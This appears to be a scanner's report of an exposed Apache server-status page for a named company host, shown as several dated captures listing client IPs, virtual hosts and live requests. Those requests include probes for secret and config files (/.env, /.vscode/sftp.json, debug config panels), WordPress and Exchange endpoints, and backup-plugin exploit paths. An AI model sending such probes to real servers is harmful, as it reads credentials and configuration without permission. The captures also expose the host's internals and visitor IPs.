HTTP/1.1 1-3566453580/1/21652_ 0.0100146801760.00.00582.78 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-3566453580/0/20453_ 0.00063108981600.00.00479.68 138.68.86.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3566453550/2/18888_ 0.0100127167930.00.00418.89 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-3566453550/1/20336_ 0.0100114692560.00.00517.00 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 2-3566453550/1/20510_ 0.0000129126950.00.00505.84 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-3566453550/1/20158_ 0.0100127517460.00.001883.35 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-3566453550/0/20209_ 0.00060108661580.00.00565.89 64.23.212.125http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-3566453550/2/19757_ 0.0000134522190.00.00493.91 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 2-3566453550/1/19655_ 0.0000105630040.00.001873.70 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3566453550/2/19870_ 0.010070079540.00.00565.02 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3566453550/2/20009_ 0.0100117512350.00.00509.52 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 2-3566453550/1/19455_ 0.0100111907650.00.00478.93 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-3566454870/2/22412_ 0.0200101116210.00.01595.41 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-3566454870/2/22000_ 0.020096124110.00.00625.30 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3566454870/0/23004_ 0.00085135016330.00.00507.72 64.23.212.125http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-3566454870/1/22239_ 0.0200139742460.00.00546.30 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-3566454870/0/22444_ 0.00065111164380.00.00473.56 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3566454870/0/22465_ 0.0006395753970.00.00599.52 138.68.86.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3566454870/1/21756_ 0.0200117922550.00.00602.61 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3566454870/0/21743_ 0.0006297066230.00.00501.78 64.226.78.121http/1.1 3-3566454870/0/21155_ 0.00047100215810.00.00472.46 64.226.78.121http/1.1 3-3566454870/0/21600_ 0.00030116885890.00.00611.64 138.68.86.32http/1.1 4-3566453570/2/24505_ 0.0000163875960.00.00675.21 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-3566453570/1/24463_ 0.0000124830070.00.002031.07 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-3566453570/2/23642_ 0.0000129712100.00.00580.79 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-3566453570/1/24615_ 0.000089883000.00.00514.92 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-3566453570/1/23561_ 0.0000153093930.00.00588.80 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-3566453570/0/23136_ 0.00061137032180.00.00517.73 64.23.212.125http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 4-3566453570/2/24227_ 0.020
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8b90780cf
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 08-Mar-2024 11:23:02 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 334 Parent Server MPM Generation: 333 Server uptime: 37 days 40 minutes 3 seconds Server load: 0.11 0.11 0.23 Total accesses: 1035990 - Total Traffic: 30.6 GB - Total Duration: 594033055 CPU Usage: u149.13 s175.01 cu5361.41 cs3916.14 - .3% CPU load .324 requests/sec - 10.0 kB/second - 31.0 kB/request - 573.396 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0550439no0yes010000 1550442no1yes010000 2550575no1yes010000 3550440no0yes19000 4550441no0yes010000 Sum502 149000 ______________________________________W___________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3335504390/64/19189_ 14.222482887481980.00.92499.80 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/27/18818_ 14.3341737113677140.00.25463.81 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/28/18924_ 14.311457143052590.013.57553.60 157.245.36.108h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3335504390/27/18714_ 13.564121106995520.00.89457.48 172.71.186.166h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/23/18830_ 14.214122283861710.00.24497.72 185.175.63.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/29/18359_ 14.422533383448290.00.68439.61 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/28/18484_ 14.551095746200.00.46378.55 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3335504390/40/18282_ 13.574290207300680.01.20441.55 162.158.22.159h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/30/19236_ 14.14150130680740.00.54438.99 157.245.36.108h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3335504390/30/19355_ 13.042484663015200.00.411875.34 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/277/20483_ 26.380094851790.03.46499.14 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3335504420/324/20512_ 26.3800140309730.03.36476.65 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-3335504420/473/19942_ 26.29062173816030.06.01476.44 157.245.36.108h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3335504420/378/20445_ 26.380098792890.04.52552.38 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3335504420/695/20190_ 26.374989202637200.06.70499.24 162.158.235.64h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/506/19094_ 26.31450206388930.04.39548.85 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/623/20677_ 26.3745113264270.06.57592.45 162.158.22.4h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/313/20619_ 26.341250144092240.03.55421.42 157.245.36.108http/1.1 1-3335504420/413/21439_ 26.3821146410610.04.94579.45 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-3335504420/421/20321_ 26.3201108802160.06.18477.61 162.158.23.11h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/155/18328_ 20.36150125667970.01.55406.26 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-3335505750/249/19882_ 20.33171017112960220.02.19507.82 162.158.22.209h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/330/20063_ 20.2610374127643080.04.05497.27 172.69.7.20h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/187/19742_ 20.351342125660600.01.821870.84 157.245.36.108http/1.1 2-3335505750/229/19762_ 20.1812678106900450.02.17541.14 157.245.36.108http/1.1 2-3335505750/173/19297_ 20.2216963132783860.02.71480.01 172.70.246.196h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/255/19169_ 20.271670103156250.02.421862.44 79.232.58.12http/1.1barrerasdecontencion.com:443POST /wp-login.php HTTP/1.1 2-3335505750/183/19442_ 20.36152668226420.02.05539.86 185.175.63.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/180/19528_ 20.3415910115861950.011.78484.06 172.68.225.124h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/157/18949_ 20.3510845110121920.01.59465.88 162.158.182.165h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/163/21780_ 19.43314398817780.02.34584.57 2.136.78.3h2relehse.com:443idle, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 3-3335504400/206/21433_ 19.670089362750.02.37616.18 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-3335504400/151/22421_ 18.11309374132723410.02.90497.85 172.70.214.109h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/297/21585_ 19.08323170137113440.04.17522.63 35.199.25.81http/1.1barrerasdecontencion.com:443done, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 3-3335504400/255/21826_ 19.65361109033130.02.83452.11 141.101.69.15h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/362/21793_ 19.423642193412050.03.76574.20 2.136.78.3h2relehse.com:443idle, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 3-3335504400/224/21126_ 19.5331437114975690.02.43580.26 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/175/21128_ 19.47319394477520.02.82490.99 49.235.65.73http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/153/20551W 19.430097351490.02.06461.43 157.245.36.108http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-3335504400/165/20918_ 19.453090114511100.04.01597.63 172.68.134.24h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/21/24004_ 11.95795347161888170.00.27647.34 172.68.110.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/34/23981_ 11.98141070122638740.01.232017.63 157.245.36.108http/1.1 4-3335504410/19/23140_ 13.576741117127633780.00.39549.72 172.71.214.120h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/67/24074_ 13.5767348687341350.00.60485.26 172.71.214.120h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-3335504410/25/23044_ 13.017950150984410.00.24563.82 172.71.186.97h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/15/22648_ 12.51959605134685400.01.06502.24 172.64.236.136h2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc88a544412
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 07-Mar-2024 23:43:02 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 333 Parent Server MPM Generation: 332 Server uptime: 36 days 13 hours 4 seconds Server load: 0.32 0.25 0.18 Total accesses: 1024630 - Total Traffic: 30.5 GB - Total Duration: 585802986 CPU Usage: u170.88 s185.86 cu5265.04 cs3844.99 - .3% CPU load .325 requests/sec - 10.1 kB/second - 31.2 kB/request - 571.721 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0521405no2yes010000 1521408no0yes010000 2521538no0yes19000 3521406no0yes010000 4521407no1yes010000 Sum503 149000 ___________________________W______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3325214050/153/19059_ 23.461087243910.02.90497.55 104.131.1.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3325214050/145/18738_ 23.2532113414220.02.47462.51 104.131.1.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3325214050/161/18844_ 23.3900142885980.01.64538.82 188.114.111.167h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3325214050/140/18617_ 23.4610106675880.01.90454.92 104.131.1.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3325214050/153/18748_ 23.40268983596570.01.85496.31 141.101.76.154h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3325214050/164/18260_ 23.462083105110.01.24438.30 104.131.1.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-3325214050/159/18404_ 23.3926095479870.012.10377.36 172.68.134.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3325214050/161/18187_ 23.3121207032920.01.88439.54 104.131.1.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3325214050/164/19152_ 23.2420130427580.01.73437.55 165.154.51.221http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3325214050/152/19279_ 23.460062843490.02.681874.02 104.131.1.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3325214080/466/20133_ 28.7067089790420.07.28494.91 172.70.178.11h2lcftech.es:443done, streams: 0/10/10/0/0 (open/recv/resp/push/rst) 1-3325214080/617/20113_ 28.8996470138869860.020.18471.27 165.154.51.221http/1.1 1-3325214080/558/19381_ 29.0292470558280.010.60469.04 66.102.6.42h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3325214080/564/19990_ 29.2366097279500.07.23546.30 172.64.236.64h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3325214080/336/19428_ 28.61610193057740.03.80491.52 172.69.33.242h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3325214080/389/18505_ 29.23670203763750.06.20543.17 172.68.134.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3325214080/378/19978_ 29.02920102333590.07.98572.28 66.102.6.42h2barrerasdecontencion.com:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 1-3325214080/381/20234_ 29.206183140142140.09.58417.03 172.70.46.20h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3325214080/473/20955_ 28.5462625144939430.06.37572.45 172.71.150.66h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3325214080/384/19824_ 28.88620107469380.06.11469.53 165.154.51.221http/1.1 2-3325215380/479/18131_ 30.56103779124439990.06.20403.76 4.194.252.94http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3325215380/335/19598_ 30.066168103435580.05.63504.93 107.189.1.9http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3325215380/494/19688_ 30.62610121876360.011.16492.69 172.69.33.58h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3325215380/306/19516_ 30.7410360123020770.06.091868.15 172.70.127.97h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3325215380/319/19492_ 31.26660104351900.018.91538.62 172.70.57.245h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3325215380/416/19082_ 31.26660130843040.033.99476.85 188.114.111.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3325215380/330/18871_ 30.62930101515020.04.841859.45 165.154.51.221h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3325215380/383/19220W 30.760064534200.05.44536.80 104.131.1.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3325215380/393/19304_ 30.75611114450650.07.26471.80 172.70.131.7h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3325215380/504/18756_ 30.73610109259370.08.69463.77 172.70.127.64h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3325214060/182/21604_ 22.8262098173040.03.46582.05 66.102.6.41h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3325214060/189/21214_ 23.0067088721210.014.87613.64 172.68.134.126h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3325214060/242/22249_ 22.131074132072270.02.72494.25 172.71.131.36h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3325214060/170/21271_ 22.52930136521050.02.61518.09 165.154.51.221h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3325214060/245/21557_ 22.4062335108472890.01.78449.03 172.69.33.210h2tandemsl.com:443done, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 3-3325214060/169/21415_ 22.5294092816750.04.21569.96 165.154.51.221http/1.1 3-3325214060/167/20883_ 22.9701114191600.03.44577.51 165.154.51.221http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.0 3-3325214060/168/20940_ 23.020093759980.014.17488.03 104.131.1.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3325214060/184/20388_ 22.8294196705240.02.26459.33 165.154.51.221http/1.1 3-3325214060/201/20732_ 22.82670113873630.016.67593.51 66.102.6.41h2barrerasdecontencion.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 4-3325214070/163/23962_ 23.4530161805330.03.21646.95 104.131.1.32http/1.1 4-3325214070/239/23933_ 23.654929122496440.02.682016.25 104.131.1.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-3325214070/284/23101_ 23.8200127512190.04.96547.62 104.131.1.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-3325214070/223/23991_ 23.703087255100.03.33484.30 104.131.1.32http/1.1 4-3325214070/172/22991_ 23.793819150941550.04.23563.20 104.131.1.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-3325214070/167/22611_ 23.7331070134632970.02.55500.99 104.131.1.32http/1.1 4-3325214070/163/23757_ 23.454256
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8439a3071
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 02-Feb-2024 20:43:38 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 10 Parent Server MPM Generation: 9 Server uptime: 2 days 10 hours 39 seconds Server load: 0.04 0.03 0.04 Total accesses: 71188 - Total Traffic: 2.1 GB - Total Duration: 29208833 CPU Usage: u95.82 s73.06 cu266.16 cs189.38 - .299% CPU load .341 requests/sec - 10.5 kB/second - 30.7 kB/request - 410.306 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02904681no1yes010000 12904814no1yes010000 22904682no1yes010000 32904683no1yes010000 42904684no1yes19000 Sum505 149000 _________________________________________________W Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-929046810/131/1087_ 24.6122505135930.03.5434.52 198.251.77.72http/1.1 0-929046810/137/967_ 24.6013182817470.01.9317.42 198.251.77.72http/1.1 0-929046810/135/1006_ 24.72229219212420.021.0334.68 198.251.77.72http/1.1pre.relehse.com:443GET /.env.live HTTP/1.1 0-929046810/134/1010_ 24.722251411007290.06.7322.98 198.251.77.72http/1.1pre.relehse.com:443GET /www.pre.relehse.com/.env HTTP/1.1 0-929046810/154/1160_ 24.61229166320320.03.2750.35 198.251.77.72http/1.1 0-929046810/148/1139_ 24.7222704559540.04.3251.44 198.251.77.72http/1.1pre.relehse.com:80GET /.env.swp HTTP/1.1 0-929046810/126/1063_ 24.71804289340.02.9142.68 198.251.77.72http/1.1pre.relehse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/127/991_ 24.60807073050.016.3728.53 198.251.77.72http/1.1 0-929046810/183/1196_ 24.612272355887830.05.4442.31 198.251.77.72http/1.1 0-929046810/153/1171_ 24.821304453340.04.3949.34 172.64.236.51h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/413/1949_ 33.581308141030.020.5062.69 172.64.236.40h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/391/2022_ 33.481305854270.09.7668.98 198.251.77.72http/1.1 1-929048140/435/1940_ 33.5181724940980.010.8737.67 43.155.160.173http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/366/2071_ 33.60007190190.018.3549.18 159.203.63.67http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-929048140/336/1826_ 33.48806289280.021.5182.62 198.251.77.72http/1.1 1-929048140/361/1916_ 33.380154418990.09.1274.08 198.251.77.72http/1.1 1-929048140/469/2072_ 33.4913164850520.019.2667.31 198.251.77.72http/1.1pre.relehse.com:443GET /.env.swp HTTP/1.1 1-929048140/398/2106_ 33.56805675050.06.2034.01 172.69.194.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/436/2028_ 33.48804946090.06.5632.67 198.251.77.72http/1.1 1-929048140/375/1973_ 33.581306995590.09.0845.03 172.64.236.112h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/285/1067_ 29.00227142640130.05.4318.94 198.251.77.72http/1.1pre.relehse.com:443GET /.env.swp HTTP/1.1 2-929046820/299/1016_ 29.06671472246990.04.7649.87 178.159.37.38http/1.1barrerasdecontencion.com:443POST /wp-content/plugins/backup-backup/includes/backup-heart.ph 2-929046820/295/1180_ 27.68712674760.017.2539.06 198.251.77.72http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/398/1366_ 29.081202805950.06.8351.78 172.64.236.127h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/202/1188_ 28.6022602600760.016.2835.70 198.251.77.72http/1.1 2-929046820/197/1245_ 28.9022602796140.03.2318.63 198.251.77.72http/1.1 2-929046820/270/1240_ 27.4322806109140.05.6150.81 198.251.77.72http/1.1 2-929046820/215/1032_ 27.476302628830.03.7729.75 178.159.37.38http/1.1 2-929046820/241/1148_ 28.997194058170.07.4126.29 198.251.77.72http/1.1pre.relehse.com:443GET /pre.relehse.com/.env HTTP/1.1 2-929046820/256/1186_ 29.00226152493560.08.1975.22 198.251.77.72http/1.1pre.relehse.com:443GET /.env.swp HTTP/1.1 3-929046830/416/1477_ 33.86103965740.020.0956.06 159.203.63.67http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-929046830/360/1462_ 33.87103664370.019.5935.81 159.203.63.67http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-929046830/526/1589_ 33.7301983576270.019.7538.54 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-929046830/296/1373_ 33.8121223431370.05.5038.76 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-929046830/442/1503_ 33.86303565810.08.0824.91 159.203.63.67http/1.1 3-929046830/357/1400_ 33.79303737980.016.6248.62 159.203.63.67http/1.1 3-929046830/329/1378_ 33.702164312120.019.0362.31 159.203.63.67http/1.1 3-929046830/323/1510_ 33.84303925850.05.2140.08 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-929046830/340/1394_ 33.75303533400.07.4340.16 159.203.63.67http/1.1 3-929046830/281/1319_ 33.70204558360.016.4352.27 159.203.63.67http/1.1 4-929046840/415/1454_ 33.082165900090.05.7652.43 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-929046840/360/1390_ 33.08807184160.07.8831.60 198.251.77.72http/1.1pre.relehse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/442/1487_ 33.20204699790.07.1126.92 159.203.63.67http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-929046840/427/1604_ 33.19403986950.08.5927.37 159.203.63.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-929046840/380/1504_ 33.21004811390.019.2041.28 159.203.63.67http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-929046840/307/1278_ 33.15105508020.05.0622.68 178.159.37.38http/1.1barrerasdecontencion.com:80GET /wp-content/plugins/backup-backup/includes/hro.php HTTP/1.1 4-929046840/317/1562_ 33.21104769420.05.0037.06 159.203.63.67http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-929046840/329/1334_ 33.13405115110.06.5627.76 172.71.131.108h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/319/1450_ 33.20415018200.05.3852.20 159.203.63.67http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-929046840/310/1359W 33.18005710710.08.265
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8b88d15cd
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 09-Jan-2024 15:14:33 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 68 Parent Server MPM Generation: 67 Server uptime: 11 days 4 hours 53 minutes 20 seconds Server load: 0.02 0.06 0.01 Total accesses: 318421 - Total Traffic: 6.0 GB - Total Duration: 123046806 CPU Usage: u26.86 s37.11 cu1519.92 cs1077.26 - .275% CPU load .329 requests/sec - 6.5 kB/second - 19.8 kB/request - 386.428 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01691622no0yes010000 11691620no0yes010000 21691751no1yes010000 31691621no0yes19000 41691619no2yes010000 Sum503 149000 _________________________________W________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6716916220/1/7082_ 0.01078337701640.00.03122.11 172.70.57.176h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6716916220/2/7416_ 0.040025827300.00.00130.38 